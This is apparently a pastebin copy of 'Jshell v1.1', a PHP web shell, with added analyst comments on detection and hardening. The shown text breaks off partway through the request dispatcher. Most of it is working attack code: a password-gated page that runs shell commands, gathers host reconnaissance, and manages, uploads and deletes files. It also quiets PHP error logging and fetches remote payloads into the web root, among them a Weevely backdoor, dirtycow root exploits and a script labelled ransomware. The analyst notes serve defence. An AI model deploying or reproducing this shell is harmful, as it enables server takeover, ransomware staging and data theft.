
Jshell v1.1

a guest
Jun 4th, 2018
  1. <?php
  2. /**
  3. * [ Jshell v1.1 - 2018. ]
  4. *
  5. * @author shutdown57 ( alinko ) < alinkokomansuby@gmail.com >
  6. * @version 1.0 2018
  7. * @link page  : https://facebook.com/fp.javcode
  8. * @link group : https://facebook.com/groups/jc.javcode
  9. * @see https://github.com/alintamvanz ( alintamvanz )
  10. * @see https://pastebin.com/u/shutdown57 ( shutdown57 )
  11. * @copyright &copy; 2018 JavCode.
  12. *
  13. **/
  14. $config = [
      // Page settings handed to Jheader() at the bottom of the script.
      // Analyst note: the icon, both scripts and the stylesheet are fetched over
      // plain HTTP from a single third-party host, so any browser that renders
      // this page contacts that host; proxy and DNS logs can be searched for it.
  15.         'title' => 'Jshell v1.1', // text used for the page <title> and the header caption
  16.     'debug' => true, // intended switch between full error reporting and none
  17.         'icon' => 'http://alintamvanz.github.io/jshell/javcode-grey.png',
  18.     'src_jquery' => 'http://alintamvanz.github.io/jshell/jquery.min.js',
  19.     'src_datatables' => 'http://alintamvanz.github.io/jshell/jquery.dataTables.js',
  20.     'src_style' => 'http://alintamvanz.github.io/jshell/style-js.css',
  21. ];
  22.  
  23. Class Jshell{
  24.     public $menubar;
  25.   public $src_link;
  26.   public $password;
  27.  public function __construct()
  28.  {
  29.     /** Entry point: configures the PHP runtime, enforces the password gate, then builds the menu and payload tables. **/
  30. $this->password = 'w'; // hard-coded access password, stored in clear text in the file
  31.  
      // Error-reporting level is chosen from a $config['debug'] lookup.
  32. if($config['debug'] === true)
  33.   { error_reporting(-1); }else{ error_reporting(0); }
  34. error_log(0);
  35. session_start();
  36. ob_start();
  37. set_time_limit(0);
      // Analyst note: the ini_set() calls below clear the error_log target, turn
      // log_errors and display_errors off and lift the execution time limit, all
      // with @ so a refused setting stays silent. PHP's own error log is therefore
      // a poor source for this script's activity; web-server access logs and
      // file-integrity monitoring are the more dependable records.
  38. @ini_set('error_log',NULL);
  39. @ini_set('log_errors',0);
  40. @ini_set('max_execution_time',0);
  41. @ini_set('output_buffering',0);
  42. @ini_set('display_errors', 0);
  43.  
  44. // login authentication: every request without the 'jshell' session flag gets
      // only the password form and then exit, so nothing else in the file runs.
  45. if(empty($_SESSION['jshell']))
  46. {
  47.   echo "<center><h3>Jshellv1 - 2018</h3><form method=post><input type=password name=passw placeholder=password><input type=submit value=Go></form></center>";
  48.   if(isset($_POST['passw']))
  49.   {
        // Loose (==) comparison of the POSTed value against the stored password.
  50.     if($_POST['passw'] == $this->password)
  51.     {
  52.       $_SESSION['jshell'] = true;
          // Analyst note: the redirect places the password in the query string
          // ("login" parameter), so a successful login leaves a GET request
          // carrying that parameter in the access log right after the POST.
  53.       echo "<meta http-equiv=refresh content=0;url=?login=".$this->password.">";
  54.     }
  55.   }
  56.   exit;
  57. }
  58.  
      // Working directory: the jshell_path query parameter when present, otherwise
      // the script's own directory. The value is used as given (no validation
      // here) for chdir() and for building every menu link.
  59.   $GLOBALS['getfullpath'] = (empty($_GET['jshell_path'])) ? getcwd() : $_GET['jshell_path'];
  60.   @chdir($GLOBALS['getfullpath']);
  61.   $baselink = "?jshell_path=".$GLOBALS['getfullpath']."&jshell_act=";
      // Menu label => link. The suffix after jshell_act= selects a branch of the
      // dispatcher at the bottom of the file. Analyst note: the parameter names
      // jshell_path / jshell_act / jshell_file and these action codes are stable
      // strings to hunt for in request logs.
  62.     $this->menubar = [
  63.     'Home' => $_SERVER['PHP_SELF'],
  64.     'Upload' => $baselink.'upl',
  65.   'Command' => $baselink.'cmd',
  66.   'Localroot' => $baselink.'lc',
  67.   'Back Connect' => $baselink.'net',
  68.   'PHP' => $baselink.'php',
  69.   'Weevely' => $baselink.'wev',
  70.   'Ransomware' => $baselink.'rans',];
  71.  
      // Remote locations of additional payloads. The 'weevely' and 'ransomware'
      // entries are passed to Jcaller() by the dispatcher. Analyst note: these are
      // outbound fetches made by the web server itself, so egress logs from the
      // server (not the client) are where they would appear.
  72.   $this->src_link = [
  73.     'adminer' => '',
  74.     'weevely' => 'https://raw.githubusercontent.com/alintamvanz/alintamvanz.github.io/master/jshell/Jweevely.php',
  75.     'mailer' => '',
  76.     'lc' => [
  77.       'dirty' => 'https://github.com/alintamvanz/localroot/raw/master/dirtycow-mem',
  78.       'c0w' => 'https://github.com/alintamvanz/localroot/raw/master/c0w',
  79.       'cowroot' => 'https://github.com/alintamvanz/localroot/raw/master/cowroot',
  80.     ],
  81.     'ransomware' => 'https://pastebin.com/raw/JfzDnXK3',
  82.   ];
  83.  
  84.  
  85. }
  86.  public function Jcmd($cmd) {
       // Runs $cmd as an operating-system command and returns its output as a string.
       // The first of system(), exec(), passthru(), shell_exec() that exists is used;
       // when none exists the method falls through and returns nothing. Every call
       // is prefixed with @, so PHP warnings from the attempt are suppressed.
       //
       // Analyst note: the command runs with the privileges of the PHP process.
       // Listing these four functions in php.ini disable_functions (where the
       // application does not need them) makes every branch below unavailable, and
       // process-creation telemetry showing the web-server account starting shells
       // or system tools is the matching detection signal.
  87. if(function_exists('system')) {    
      // system() prints directly, so output buffering is used to capture it.
  88.     @ob_start();    
  89.     @system($cmd);    
  90.     $exect = @ob_get_contents();    
  91.     @ob_end_clean();    
  92.     return $exect;  
  93.   } elseif(function_exists('exec')) {    
  94.     @exec($cmd,$results);    
  95.     $exect = "";    
      // Output lines are concatenated with no separator between them.
  96.     foreach($results as $result) {      
  97.       $exect .= $result;    
  98.     } return $exect;  
  99.   } elseif(function_exists('passthru')) {    
  100.     @ob_start();    
  101.     @passthru($cmd);    
  102.     $exect = @ob_get_contents();    
  103.     @ob_end_clean();    
  104.     return $exect;  
  105.   } elseif(function_exists('shell_exec')) {    
  106.     $exect = @shell_exec($cmd);    
  107.     return $exect;  
  108.   }
  109. }
  110. public function Jgetgrowif()
  111. {
  112.   if(!function_exists('posix_getegid')) {
  113.     $user = @get_current_user();
  114.     $uid = @getmyuid();
  115.     $gid = @getmygid();
  116.     $group = "?";
  117.   } else {
  118.     $uid = @posix_getpwuid(posix_geteuid());
  119.     $gid = @posix_getgrgid(posix_getegid());
  120.     $user = $uid['name'];$uid = $uid['uid'];
  121.     $group = $gid['name'];$gid = $gid['gid'];
  122.   }
  123.   $r = ['user' => $user,'uid' => $uid,'group' => $group,'gid' => $gid];
  124.   return $r;
  125. }
  126.  public function Jserverinfo()
  127.  {
        // Collects host reconnaissance data and returns it as an associative array.
        // Availability values are ready-made HTML snippets (coloured YES / NO), not
        // booleans. PHP extensions are checked with function_exists(); wget, perl,
        // python, bash and gcc are checked by running each binary through Jcmd() and
        // testing whether any output came back.
        //
        // Analyst note: Jheader() calls this method once for every field it prints,
        // so a single page view can make the PHP process launch those five binaries
        // many times over. A burst of short-lived wget/perl/python/bash/gcc child
        // processes under the web-server account is a recognisable pattern in
        // process-creation logs.
  128.   $mysql = (function_exists('mysql_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  129.   $mysqli = (function_exists('mysqli_connect')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  130.   $wget = ($this->Jcmd('wget --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  131.   $curl = (function_exists('curl_init')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  132.   $perl = ($this->Jcmd('perl --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  133.   $python = ($this->Jcmd('python --help')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  134.   $bash = ($this->Jcmd('bash --version')) ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
  135.   $gcc = ($this->Jcmd('gcc --help')) ? "<font color=lime>YES</font>" :"<font color=red>NO</font>";
  136.   $sm = (ini_get('safe_mode') == 'on') ? "<font color=lime>YES</font>" : "<font color=red>NO</font>";
        // The disable_functions list is shown in full (wrapped at 100 characters),
        // i.e. the page reports which hardening is already in place on the host.
  137.   $df = (ini_get('disable_functions')) ? wordwrap(ini_get('disable_functions'),100,"\n",true) : "<font color=red>NO !</font>";
  138.   $sysfo = [
        // 'hostname' and 'ipserver' derive from the request's Host header, which
        // the client controls; the other entries come from the PHP runtime.
  139.     'hostname' => $_SERVER['HTTP_HOST'],
  140.     'system' => php_uname(),
  141.     'phpv' => phpversion(),
  142.     'software' => $_SERVER['SERVER_SOFTWARE'],
  143.     'ipserver' => gethostbyname($_SERVER['HTTP_HOST']),
  144.     'ipclient' => $_SERVER['REMOTE_ADDR'],
  145.     'mysql' => $mysql,
  146.     'mysqli' => $mysqli,
  147.     'wget' => $wget,
  148.     'curl' => $curl,
  149.     'perl' => $perl,
  150.     'python' => $python,
  151.     'bash' => $bash,
  152.     'gcc' => $gcc,
  153.     'safemode' => $sm,
  154.     'disafunc' => $df];
  155.     return $sysfo;
  156.  }
  157.  public function Jcurdir($path,$goto){
  158.   $dir = str_replace("\\","/",$path);
  159.   $dir = explode("/",$dir);
  160.   foreach($dir as $o=>$i){
  161.     if($i == "" && $o == 0){
  162.       echo "<a href=\"javascript:menuklik('?".$goto."=/')\">/</a>";continue;}
  163.       if($i == "")continue;
  164.       echo "<a href=\"javascript:menuklik('?".$goto."=";
  165.       for($p=0;$p<=$o;$p++){
  166.         echo $dir[$p]; if($p != $o){
  167.           echo "/";} } echo "')\">".$i."</a>/";}
  168.           if(is_writable($path)){echo "- [<b><font color=lime>W</font></b>]";}elseif(is_readable($path)){echo "- [<b><font color=red>R</font></b>]";}else{echo "- [<b><font color=grey>Unknown</font></b>]<meta http-equiv='refresh' content='4;url=?'>";}}
  169.  public function Jcaller($url,$name)
  170.  {
        // Downloads the resource at $url and writes it to the local file $name.
        // The file is opened with mode "w", so an existing file of that name is
        // truncated. The return value is whatever fwrite() returns. The dispatcher
        // at the bottom of the file calls this for its 'wev' and 'rans' actions
        // with URLs taken from $this->src_link.
        //
        // Analyst note: reading an http(s) URL through file_get_contents() depends
        // on the allow_url_fopen setting. Turning that setting off where the
        // application does not need it, restricting outbound connections from web
        // servers, and alerting on new .php files appearing in the web root each
        // interrupt this download-and-write step.
  171. $fp = fopen($name,"w");
  172. $co = file_get_contents($url);
  173. return fwrite($fp,$co);
  174. fclose($fp);
  175.  }
  176.  public function Jheader($config = array())
  177.  {
  178.     ?>
  179.     <!DOCTYPE html>
  180.     <html>
  181.     <head>
  182.         <title><?=$config['title'];?> [<?=$_SERVER['HTTP_HOST'];?>]</title>
  183.         <meta charset="utf-8">
  184.         <meta name="author" content="shutdown57">
  185.         <link rel="icon" type="text/css" href="<?=$config['icon'];?>">
  186.         <script type="text/javascript" src="<?=$config['src_jquery'];?>"></script>
  187.         <script type="text/javascript" src="<?=$config['src_datatables'];?>"></script>
  188.         <!-- <link rel="stylesheet" type="text/css" href="valid/assets/css/w3.css"> -->
  189.     <link rel="stylesheet" type="text/css" href="<?=$config['src_style'];?>">
  190.         <script type="text/javascript">
  191.             function select_all(pilih)
  192.             {
  193.                 var cek = document.getElementsByName('pilih[]');
  194.                 for (var i =0; n=cek.length;i++) {
  195.                     cek[i].checked = pilih.checked;
  196.                 }
  197.             }
  198.         function logout()
  199.         {
  200.           $.ajax({
  201.             url:'?jshell_act=logout',
  202.             success:function(e)
  203.             {
  204.               alert('Bye Boyz!');
  205.               window.location.href='';
  206.             }
  207.           });
  208.         }
  209.         function menuklik(uri)
  210.         {
  211.           $('.right').html("<img src='https://dfw.ink/images/loading_gif.gif' style='width:50px;height:50px;'>");
  212.           history.pushState(null,null,uri);
  213.           $.ajax({
  214.             url:uri,
  215.             success:function(e)
  216.             {
  217.               $('body').html(e);
  218.             },error:function(e)
  219.             {
  220.               alert('Something wrong :D '+e);
  221.             }
  222.           });
  223.         }
  224.         function rename(dir,file)
  225.         {
  226.           var newname = prompt('New name');
  227.           if(newname != null){
  228.             window.location.href='?jshell_path='+dir+'&jshell_file='+file+'&n='+newname+'&jshell_act=ren';
  229.           }else{
  230.             alert('Nama file masih kosong');
  231.           }
  232.         }
  233.         function hs(l,p)
  234.         {
  235.           document.getElementById(l).style.display='none';
  236.           document.getElementById(p).style.display='block';
  237.         }
  238.         function gotodir(dir)
  239.         {
  240.           var dire = $(dir).val();
  241.           $.ajax({
  242.             url:'?jshell_path='+dire,
  243.             success:function(e)
  244.             {
  245.               $('body').html(e);
  246.               history.pushState(null,null,'?jshell_path='+dire);
  247.             },error:function(e)
  248.             {
  249.               alert('error '+e);
  250.             }
  251.           });
  252.         }
  253.             $(document).ready(function()
  254.             {
  255.         $('body').hide().fadeIn(500);
  256.                 $('#filemanager').DataTable({
  257.                     'bSort':false,
  258.                 });
  259.             });
  260.         </script>
  261.     </head>
  262.     <body onload="faded(this)">
  263.         <div class="w3-container">
  264.  
  265.         <header>
  266.       <div class="right"></div>
  267.             <table class="table" style="width: 98%;margin: 0 auto;border-left: 1px dashed #eee;border-right: 1px dashed #f00;border-top: 1px dashed #f00;border-bottom: 1px dashed #eee;">
  268.                 <tr><td style="width: 200px;" class="kiri"><center><img src="https://s19.postimg.cc/jcxygcm1v/javcode-grey.png" style="max-width: 170px;max-height:170px;" ><p><?=$config['title'];?> | by : JavCode.</p></center></td><td>
  269. <pre>
  270. System : <?=$this->Jserverinfo()['system'];?> [Exploit-DB] [Search Localroot]
  271. Hostname : <?=$this->Jserverinfo()['hostname'];?> | Safe Mode : <?=$this->Jserverinfo()['safemode'];?> .
  272. Server Software : <?=$this->Jserverinfo()['software'];?>.
  273. PHP Version : <?=$this->Jserverinfo()['phpv'];?> - [<a href="javascript:menuklik('?jshell_path=<?=$GLOBALS[getfullpath]?>&jshell_act=phpinfo');">phpinfo</a>] [<a href="javascript:menuklik('?jshell_path=<?=dirname(php_ini_loaded_file());?>&jshell_file=<?=basename(php_ini_loaded_file());?>&jshell_act=view');">php.ini</a>]
  274. IP Server : <?=$this->Jserverinfo()['ipserver'];?> | IP Client : <?=$this->Jserverinfo()['ipclient'];?>.
  275. HDD : 31.89 / 180.16 GB | [ Free : 148.27 GB ]
  276. User : <?=$this->Jgetgrowif()['user'];?> [<?=$this->Jgetgrowif()['uid'];?>] || Group : <?=$this->Jgetgrowif()['group'];?> [<?=$this->Jgetgrowif()['gid'];?>]
  277. MySQL : <?=$this->Jserverinfo()['mysql'];?> | MySQLi : <?=$this->Jserverinfo()['mysqli'];?> | Wget : <?=$this->Jserverinfo()['wget'];?> | CURL : <?=$this->Jserverinfo()['curl'];?> | Perl : <?=$this->Jserverinfo()['perl'];?> | Python : <?=$this->Jserverinfo()['python'];?> | Bash : <?=$this->Jserverinfo()['bash'];?> | GCC ( compiler ) : <?=$this->Jserverinfo()['gcc'];?>.
  278. Disable functions : <?=$this->Jserverinfo()['disafunc'];?>
  279.           </pre>
  280.         </td>
  281.       </tr>
  282.     </table>
  283.     <div style="margin-left:10px;margin: 4px;">
  284.     <div id="cd">
  285.         <a href="javascript:hs('cd','dc');">Current dir</a> ::  <?= $this->Jcurdir($GLOBALS['getfullpath'],'jshell_path');?>
  286.     </div>
  287.     <div id="dc" style="display: none;">
  288.         <label>Go to dir :: </label>
  289.         <input type="text" id="gtd" value="<?=$GLOBALS['getfullpath'];?>" class="input_m"><input type="button" value=">>" onclick="gotodir('#gtd')" class="submit_m">
  290.     </div>
  291.   </div>
  292.       <ul align=center>
  293.  <?php
  294.  foreach($this->menubar as $menu=>$link){
  295.   echo '<li>[<a href="#" onclick="menuklik(\''.$link.'\');" >'.$menu.'</a>]</li>';
  296.     }
  297.     ?>
  298.   [<a href="#" onclick="logout()"><font color=red>Logout</font></a>]
  299.   </ul>
  300.         </header><br/><br/>
  301.         <h1></h1>
  302.     <?php
  303.  }
  304.  public function Jsdir($dir)
  305.  {
  306.      // Check if scandir() exist in server.
  307.     if(function_exists('scandir'))
  308.     {
  309.         $s = scandir($dir);
  310.     }
  311.     return $s;
  312.  }
  313.  public function Jgetfsize($files) // function for get file size.
  314.  {
  315.     $size = filesize($files)/1024;
  316.     $size = round($size,3);
  317.     if($size > 1024){
  318.         $size = round($size/1024,2). 'MB';
  319.     } else {
  320.         $size = $size. 'KB';}
  321.         return $size;
  322.  }
  323.  public function Jgetmime($files) // function for get mime content type
  324.  {
  325.     if(function_exists('mime_content_type'))
  326.     {
  327.         if(is_readable($files)){
  328.         $mime =mime_content_type($files);
  329.         }else{
  330.         $mime = "Unknown";
  331.         }
  332.     }else{
  333.         if(is_file($files))
  334.         {
  335.             $mime = "Files";
  336.         }elseif (is_dir($files)) {
  337.             $mime = "Directory";
  338.         }else{
  339.             $mime = "Unknown";
  340.         }
  341.     }
  342.     return $mime;
  343.  }
  344.  public function Jvf($f){
  345.   $file = wordwrap(file_get_contents($f),150,"\n",true);
  346.   $a= highlight_string($file,true);
  347.   $old = array("0000BB","000000","FF8000","DD0000", "007700");
  348.   $new = array("F73D80","e1e1e1", "05f6fa", "F9FF00" , "1dff1b");
  349.   $a= str_ireplace($old,$new, $a);
  350.   $result = "<div class=\"code\">";$result .= $a;$result.="</div>";
  351.   return $result;}
  352.  public function Jdel($dir){
  353.   if(is_dir($dir)){
  354.     if(!rmdir($dir)){
  355.       $s=scandir($dir);
  356.       foreach ($s as $ss) {
  357.         if(is_file($dir."/".$ss)){
  358.           if(unlink($dir."/".$ss)){
  359.             $rm=rmdir($dir);
  360.           }
  361.         }
  362.         if(is_dir($dir."/".$ss)){
  363.           $rm=rmdir($dir."/".$ss);
  364.           $rm.=rmdir($dir);
  365.         }
  366.       }
  367.   }elseif(is_file($dir)){
  368.     $rm = unlink($dir);
  369.   }
  370. }elseif(is_file($dir))
  371. {
  372.   $rm = unlink($dir);
  373. }
  374. return $rm;
  375. }
  376.  public function Jupl($a,$b){
  377.   if(function_exists('move_uploaded_file')){
  378.     $upl = move_uploaded_file($a,$b);
  379.   }elseif (function_exists('copy')) {
  380.     $upl = copy($a,$b);
  381.   }
  382.     return $upl;
  383.   }
  384.   public function array_upload($file){
  385.     $file_ary = array();
  386.     $file_count = count($file['name']);
  387.      $file_key = array_keys($file);
  388.      for($i=0;$i<$file_count;$i++) {
  389.       foreach($file_key as $val) {
  390.         $file_ary[$i][$val] = $file[$val][$i];
  391.       }
  392.     }
  393.     return $file_ary;
  394.   }
  395.  public function Jgetdmod($files) // function for get date modified.
  396.  {
  397.     $a_fdm=@date("d-m-Y H:i:s", filemtime($files));
  398.     return $a_fdm;
  399.  }
  400.  public function Jgetowner($path){
  401.     if(function_exists('posix_getpwuid')) {
  402.         $downer = @posix_getpwuid(fileowner($path));
  403.         $downer = $downer['name'];
  404.     } else {
  405.         $downer = fileowner($path);
  406.     }
  407.     return $downer;
  408.  }
  409.  public function Jgetgroup($path){
  410.     if(function_exists('posix_getgrgid')) {
  411.         $dgrp = @posix_getgrgid(filegroup($path));
  412.         $dgrp = $dgrp['name'];
  413.     } else {
  414.         $dgrp = filegroup($path);
  415.     }
  416.     return $dgrp;}
  417.   public function Jwrite($fname,$content)
  418.   {
  419.     $fp = fopen($fname,'w');
  420.     fwrite($fp,$content);
  421.     fclose($fp);
  422.   }
  423.  public function Jgetperms($file){
  424.     $perms = fileperms($file);
  425.     if (($perms & 0xC000) == 0xC000) {
  426.         $info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';}$info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info;}
  427.  
  428.     public function Jgetact($dir,$file)
  429.     {
  430.         $act_files = [
  431.             'delete' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=del',
  432.             'edit' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=edit',
  433.       'download' => '?jshell_path='.$dir.'&jshell_file='.$file.'&jshell_act=dl',
  434.                 ];
  435.         $act_dirs = [
  436.             'delete' => '?jshell_path='.$dir.'&jshell_act=del',
  437.             ];
  438.         $a ='| ';
  439.         if(is_file($dir.'/'.$file))
  440.         {
  441.             foreach($act_files as $val=>$link)
  442.             {
  443.         $getap = explode("jshell_act=",$link);
  444.         $getap= $getap[1];
  445.         $title = str_replace(['ren','del','edit','dl'],['rename file : '.$file,'delete file : '.$file,'edit file : '.$file,'download file : '.$file],$getap);
  446.                 $a.= '<a href="#" onclick="menuklik(\''.$link.'\')" title="'.$title.'">'.$val.'</a> | ';
  447.             }
  448.       $a.= '<a href="#" onclick="rename(\''.$dir.'\',\''.$file.'\')" title="rename file : '.$file.'">rename</a> | ';
  449.         }elseif(is_dir($dir.'/'.$file))
  450.         {
  451.             foreach($act_dirs as $val=>$link)
  452.             {$getap = explode("jshell_act=",$link);
  453.         $getap= $getap[1];
  454.         $title = str_replace(['ren','del','edit','dl'],['rename file : '.$file,'delete file : '.$file,'edit file : '.$file,'download file : '.$file],$getap);
  455.                 $a.= '<a href="#" onclick="menuklik(\''.$link.'\')" title="'.$title.'">'.$val.'</a> | ';
  456.             }
  457.       $a.= '<a href="#" onclick="rename(\''.$dir.'\',\''.$file.'\')" title="rename dir : '.$file.'">rename</a> | ';
  458.         }
  459.         return $a;
  460.     }
  461.   public function Jtitle($text)
  462.   {
  463.     echo "<center><h3 class=\"titleac\">..:: ".$text." ::..</h3></center><br/>";
  464.   }
  465.  public function Jfileman($path)
  466.  {
  467.     ?>
  468.   <form method="post">
  469.     <table class="a_exp" id="filemanager" style="margin-top: 0px">
  470.         <thead>
  471.             <tr><th><input type="checkbox" name="pilih[]" onclick="select_all(this)"></th>
  472.                 <th>Files</th>
  473.                 <th>Size</th>
  474.                 <th>Type</th>
  475.                 <th>Date Modif</th>
  476.                 <th>Owner:Group</th>
  477.                 <th>Permission</th>
  478.                 <th>Action</th>
  479.             </tr>
  480.         </thead>
  481.         <tbody>
  482.             <tr><td></td><td><a href="#" onclick="menuklik('?jshell_path=<?=dirname($GLOBALS['getfullpath']);?>')"><< Parent directory</a></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
  483.             <?php
  484.             /* Scan directory in server */
  485.             $sdirs = $this->Jsdir($path);
  486.             foreach($sdirs as $sd)
  487.             {if(is_file($path.'/'.$sd)||$sd == '.'||$sd == '..')continue;
  488.                 ?><tr>
  489.                     <td><input type="checkbox" name="pilih[]" value="<?=$path.'/'.$sd;?>"></td>
  490.                     <td><a href="#" onclick="menuklik('?jshell_path=<?=$path.'/'.$sd;?>')"><?=$sd;?></a></td>
  491.                     <td><?=$this->Jgetfsize($path.'/'.$sd);?></td>
  492.                     <td><?=$this->Jgetmime($path.'/'.$sd);?></td>
  493.                     <td><?=$this->Jgetdmod($path.'/'.$sd);?></td>
  494.                     <td><?=$this->Jgetowner($path.'/'.$sd);?>:<?=$this->Jgetgroup($path.'/'.$sd);?></td>
  495.                     <td><?=$this->Jgetperms($path.'/'.$sd);?></td>
  496.                     <td><?=$this->Jgetact($path,$sd);?></td>
  497.  
  498.                 </tr>
  499.                 <?php
  500.             }
  501.             /* scan files in server */
  502.             $sfile = $this->Jsdir($path);
  503.             foreach($sfile as $sf)
  504.             {if(is_dir($path.'/'.$sf)||$sf == '.'||$sf == '..')continue;
  505.                 ?><tr>
  506.                     <td><input type="checkbox" name="pilih[]" value="<?=$path.'/'.$sf;?>"></td>
  507.                     <td><a href="#" onclick="menuklik('?jshell_path=<?=$path;?>&jshell_file=<?=$sf;?>&jshell_act=view')"><?=$sf;?></a></td>
  508.                     <td><?=$this->Jgetfsize($path.'/'.$sf);?></td>
  509.                     <td><?=$this->Jgetmime($path.'/'.$sf);?></td>
  510.                     <td><?=$this->Jgetdmod($path.'/'.$sf);?></td>
  511.                     <td><?=$this->Jgetowner($path.'/'.$sf);?>:<?=$this->Jgetgroup($path.'/'.$sf);?></td>
  512.                     <td><?=$this->Jgetperms($path.'/'.$sf);?></td>
  513.                     <td><?=$this->Jgetact($path,$sf);?></td>
  514.  
  515.                 </tr>
  516.                 <?php
  517.             }
  518.             ?>
  519.         </tbody>
  520.     </table><div style="clear: both; margin-bottom:69px"></div><table style="bottom: 0;left: 0;position: fixed;"><tr><td>
  521.         Actions</td><td><select name="actionx" class="input_m">
  522.           <option>----[ action ]----</option>
  523.           <option value="delete">Delete</option>
  524.           <?php
  525.           if(empty($_SESSION['cfile'])){
  526.             ?>
  527.           <option value="copy">Copy</option>
  528.           <?php
  529.             }else{
  530.               ?><option value="paste">Paste</option><?php
  531.             }
  532.             ?>
  533.         </select><input type="submit" name="sac" value=">>" class="submit_m">
  534.   </td></tr></table>
  535. </form>
  536.     <?php
  537.   if(isset($_POST['sac']))
  538.   {
  539.     if($_POST['actionx'] == 'delete')
  540.     {
  541.       foreach($_POST['pilih'] as $dfil)
  542.       {
  543.         if($this->Jdel($dfil))
  544.            echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  545.          else
  546.            echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  547.       }
  548.     }elseif($_POST['actionx'] == 'copy')
  549.     {
  550.       $_SESSION['cfile'] = $_POST['pilih'];
  551.       echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  552.     }elseif($_POST['actionx'] == 'paste')
  553.     {
  554.       foreach($_SESSION['cfile'] as $paste)
  555.       {
  556.         copy($paste,$GLOBALS['getfullpath'].'/'.basename($paste));
  557.       }
  558.       unset($_SESSION['cfile']);
  559.     echo "<meta http-equiv='refresh' content='0;url=?jshell_path=".$GLOBALS[getfullpath]."'>";
  560.     }
  561.   }
  562.  }
  563.  
  564.  public function Jshell_act($type,$text = null)
  565.  {
  566.   if($type == 'cmd')
  567.   {
  568.     ?>
  569.     <form method="post">
  570.     <label>jshellv1.1 ~ $</label>
  571.     <input type="text" name="cmd" class="input_m" style="width: 500px;"><input type="submit" name="exec" value=">>" class="submit_m">
  572.     </form>
  573.     <?php
  574.   }elseif($type == 'upl')
  575.   {
  576.     ?>
  577.     <center>
  578.     <form method="post" enctype="multipart/form-data">
  579.       <label>Select file ::</label>
  580.       <input type="file" name="jfilez[]" class="input_m" multiple="">
  581.       <label>Upload to ::</label>
  582.       <input type="text" name="jdirz" value="<?=$GLOBALS['getfullpath'];?>" class="input_m"><input type="submit" name="upload" value="Upload !" class="submit_m">
  583.     </form>
  584.   </center>
  585.     <?php
  586.   }elseif ($type == 'edit') {
  587.     ?>
  588.     <center>
  589.       <form method="post">
  590.         <textarea class="txtarea_m" name="editfile"><?=$text;?></textarea>
  591.         <br/>
  592.         <input type="submit" name="save" value="Save" class="submit_m" style="padding: 10px;width: 200px;cursor: pointer;">
  593.       </form>
  594.     </center>
  595.     <?php
  596.   }elseif($type == 'lc')
  597.   {
  598.     ?>
  599.     <center>
  600.       <form method="get" action="https://google.com/search" target="_blank">
  601.         <label for="q">Search on google</label>
  602.         <input type="text" name="q" placeholder="Search exploit" class="input_m">
  603.         <input type="submit" value=">>" class="submit_m">
  604.       </form>
  605.       <br>
  606.       [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=c0w');">c0w</a>]
  607.       [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=cowroot');">cowroot</a>]
  608.       [<a href="javascript:menuklik('?jshell_path=<?=$_GET['jshell_path'];?>&jshell_act=dirtycow-mem');">dirty-mem</a>]
  609.       [<a href="https://exploit-db.com/local/" target="_blank">localroot ex-db</a>]
  610.     </center>
  611.     <?php
  612.   }elseif($type == 'bc')
  613.   {
  614.     ?><center>
  615.       <form method="post">
  616.         <label for="ip">IP </label>
  617.         <input type="text" name="ip" class="input_m" value="<?=$_SERVER['REMOTE_ADDR'];?>">
  618.         <label for="port">Port</label>
  619.         <input type="text" name="port" class="input_m" value="5758">
  620.         <input type="submit" name="sbmt" value=">>" class="submit_m">
  621.       </form>
  622.     </center>
  623.     <?php
  624.   }elseif ($type == 'php') {
  625.     ?>
  626.     <center>
  627.       <form method="post">
  628.         <textarea class="txtarea_m" name="code">echo "hello noob";</textarea><br>
  629.         <input type="submit" name="sbmt" value="Run !" class="submit_m" style="width: 120px">
  630.       </form>
  631.     </center>
  632.     <?php
  633.   }
  634.  }
  635.  
  636. }
  637.  
  638.  
  639. $js = new Jshell;
       // Request dispatcher. Constructing Jshell runs the password gate; requests
       // without the session flag never get past the line above. From here on the
       // jshell_act query parameter selects what the request does.
  640.  
  641. $js->Jheader($config);
  642. if(empty($_GET['jshell_act']))
  643. {
       // No action given: render the file manager for the current directory.
  644.     $js->Jfileman($GLOBALS['getfullpath']);
  645. }else{
  646.   // File name and directory come straight from the query string and are used
       // below, unvalidated, both in filesystem calls and in echoed HTML.
  647.   $jfilez = @$_GET['jshell_file'];
  648.   $jpaptt = @$_GET['jshell_path'];
  649.   // ---- action branches ----
  650.   if($_GET['jshell_act'] == 'del')
  651.   {
       // 'del': delete the directory, or directory/file, named by the request.
